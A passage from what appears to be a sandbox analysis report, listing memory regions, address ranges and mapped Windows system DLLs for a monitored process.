= "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2211 start_va = 0x7fefd280000 end_va = 0x7fefd299fff monitored = 0 entry_point = 0x7fefd281558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2212 start_va = 0x7fefd2a0000 end_va = 0x7fefd30bfff monitored = 0 entry_point = 0x7fefd2a2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2213 start_va = 0x7fefd310000 end_va = 0x7fefd34afff monitored = 0 entry_point = 0x7fefd311324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2214 start_va = 0x7fefd350000 end_va = 0x7fefd385fff monitored = 0 entry_point = 0x7fefd351474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2215 start_va = 0x7fefd430000 end_va = 0x7fefd59cfff monitored = 0 entry_point = 0x7fefd4310b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2216 start_va = 0x7fefd5a0000 end_va = 0x7fefd63efff monitored = 0 entry_point = 0x7fefd5a25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2217 start_va = 0x7fefd640000 end_va = 0x7fefd716fff monitored = 0 entry_point = 0x7fefd643274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2218 start_va = 0x7fefd720000 end_va = 0x7fefd84cfff monitored = 0 entry_point = 0x7fefd76ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2219 start_va = 0x7fefd850000 end_va = 0x7fefda26fff monitored = 0 entry_point = 0x7fefd851010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2220 start_va = 0x7fefda30000 end_va = 0x7fefdb38fff monitored = 0 entry_point = 0x7fefda31064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2221 start_va = 0x7fefdcc0000 end_va = 0x7fefea47fff monitored = 0 entry_point = 0x7fefdd3cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2222 start_va = 0x7fefea50000 end_va = 0x7fefeaa1fff monitored = 0 entry_point = 0x7fefea510d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2223 start_va = 0x7fefeb50000 end_va = 0x7fefeb57fff monitored = 0 entry_point = 0x7fefeb51504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2224 start_va = 0x7fefeb60000 end_va = 0x7fefebacfff monitored = 0 entry_point = 0x7fefeb61070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2225 start_va = 0x7fefebb0000 end_va = 0x7fefec8afff monitored = 0 entry_point = 0x7fefebd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2226 start_va = 0x7fefec90000 end_va = 0x7fefec9dfff monitored = 0 entry_point = 0x7fefec91080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2227 start_va = 0x7fefed40000 end_va = 0x7fefedb0fff monitored = 0 entry_point = 0x7fefed51e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2228 start_va = 0x7fefedc0000 end_va = 0x7fefefc2fff monitored = 0 entry_point = 0x7fefede3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2229 start_va = 0x7fefefd0000 end_va = 0x7feff068fff monitored = 0 entry_point = 0x7fefefd1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2230 start_va = 0x7feff400000 end_va = 0x7feff4c8fff monitored = 0 entry_point = 0x7feff47a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2231 start_va = 0x7feff4d0000 end_va = 0x7feff536fff monitored = 0 entry_point = 0x7feff4db03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2232 start_va = 0x7feff540000 end_va = 0x7feff55efff monitored = 0 entry_point = 0x7feff5460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2233 start_va = 0x7feff560000 end_va = 0x7feff58dfff monitored = 0 entry_point = 0x7feff561010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2234 start_va = 0x7feff5a0000 end_va = 0x7feff5a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2235 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 2236 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 2237 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 2238 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 2239 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 2240 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 2241 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 2242 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 2243 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 2244 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 2245 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 2246 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 2247 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2248 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 2249 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2250 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2251 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2252 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 2253 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2254 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2255 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2256 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2257 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2258 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 2259 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2260 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2261 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2262 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 2263 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2264 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2265 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2266 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2267 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2268 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2269 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2270 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2271 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 2272 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2273 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2274 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2275 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2276 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2277 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2278 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2279 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2280 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2281 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 2307 start_va = 0x2b10000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 2308 start_va = 0x3450000 end_va = 0x34cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 2899 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 2900 start_va = 0x1a00000 end_va = 0x1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2901 start_va = 0x1e40000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2902 start_va = 0x25c0000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 2903 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 2904 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 2905 start_va = 0x2b20000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 2906 start_va = 0x32e0000 end_va = 0x335ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2907 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 2908 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2909 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2910 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2911 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2912 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2913 start_va = 0x3260000 end_va = 0x32dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 2914 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2915 start_va = 0x3360000 end_va = 0x375ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 2916 start_va = 0x7fef7410000 end_va = 0x7fef7426fff monitored = 0 entry_point = 0x7fef7419d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 2917 start_va = 0x2060000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2918 start_va = 0x3840000 end_va = 0x38bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 2919 start_va = 0x3950000 end_va = 0x39cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 2920 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 2921 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2922 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 3279 start_va = 0x11a0000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 3280 start_va = 0x1a30000 end_va = 0x1aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 3281 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 3282 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3283 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3284 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3285 start_va = 0x23a0000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 3286 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 3287 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 3288 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3289 start_va = 0x29a0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 3290 start_va = 0x2a90000 end_va = 0x2b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 3291 start_va = 0x2f90000 end_va = 0x300ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 3292 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 3293 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 3294 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 3295 start_va = 0x7fef3dc0000 end_va = 0x7fef4012fff monitored = 0 entry_point = 0x7fef3dc236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 3296 start_va = 0x7fef7190000 end_va = 0x7fef7409fff monitored = 0 entry_point = 0x7fef71c2200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3297 start_va = 0x7fef60e0000 end_va = 0x7fef6150fff monitored = 0 entry_point = 0x7fef611ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3298 start_va = 0x7fefa0c0000 end_va = 0x7fefa130fff monitored = 0 entry_point = 0x7fefa0c1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3299 start_va = 0x7fef9fb0000 end_va = 0x7fefa013fff monitored = 0 entry_point = 0x7fef9fb1254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3300 start_va = 0x7fef4020000 end_va = 0x7fef403afff monitored = 0 entry_point = 0x7fef4021198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3301 start_va = 0x7fef3db0000 end_va = 0x7fef3dbefff monitored = 0 entry_point = 0x7fef3db9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 3302 start_va = 0x3120000 end_va = 0x321ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 3303 start_va = 0x77450000 end_va = 0x77456fff monitored = 0 entry_point = 0x7745106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3304 start_va = 0x39d0000 end_va = 0x3b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 3305 start_va = 0xa10000 end_va = 0xa10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3306 start_va = 0xa20000 end_va = 0xa26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3307 start_va = 0xa10000 end_va = 0xa10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3308 start_va = 0xa20000 end_va = 0xa26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3309 start_va = 0x7fefccd0000 end_va = 0x7fefccd7fff monitored = 0 entry_point = 0x7fefccd2a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 3310 start_va = 0x7fef3da0000 end_va = 0x7fef3dacfff monitored = 0 entry_point = 0x7fef3da1104 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3311 start_va = 0x7fef3da0000 end_va = 0x7fef3daefff monitored = 0 entry_point = 0x7fef3da6fb0 region_type = mapped_file name = "wups2.dll" filename = "\\Windows\\System32\\wups2.dll" (normalized: "c:\\windows\\system32\\wups2.dll") Region: id = 3312 start_va = 0x39d0000 end_va = 0x3a8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3313 start_va = 0x3b80000 end_va = 0x3b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 3314 start_va = 0xa10000 end_va = 0xa29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 3315 start_va = 0x3b90000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b90000" filename = "" Region: id = 3316 start_va = 0x3c90000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 3317 start_va = 0x3d90000 end_va = 0x3e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 3318 start_va = 0x3e90000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 3319 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 3320 start_va = 0x1220000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 3321 start_va = 0x1220000 end_va = 0x122ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 3322 start_va = 0x1230000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 3323 start_va = 0x1240000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 3324 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 3325 start_va = 0x1260000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 3326 start_va = 0x1270000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 3327 start_va = 0x3fb0000 end_va = 0x402ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 3328 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 3329 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 3330 start_va = 0x4030000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004030000" filename = "" Region: id = 3331 start_va = 0x4130000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 3332 start_va = 0x14b0000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 3333 start_va = 0x14b0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 3334 start_va = 0x14c0000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 3335 start_va = 0x14d0000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014d0000" filename = "" Region: id = 3336 start_va = 0x14e0000 end_va = 0x14effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014e0000" filename = "" Region: id = 3337 start_va = 0x14f0000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014f0000" filename = "" Region: id = 3338 start_va = 0x1500000 end_va = 0x150ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001500000" filename = "" Region: id = 3339 start_va = 0xa50000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 3340 start_va = 0x4230000 end_va = 0x522ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 3341 start_va = 0xa60000 end_va = 0xa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 3342 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 3343 start_va = 0xe40000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 3344 start_va = 0xef0000 end_va = 0xef0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3345 start_va = 0xf10000 end_va = 0xf11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" 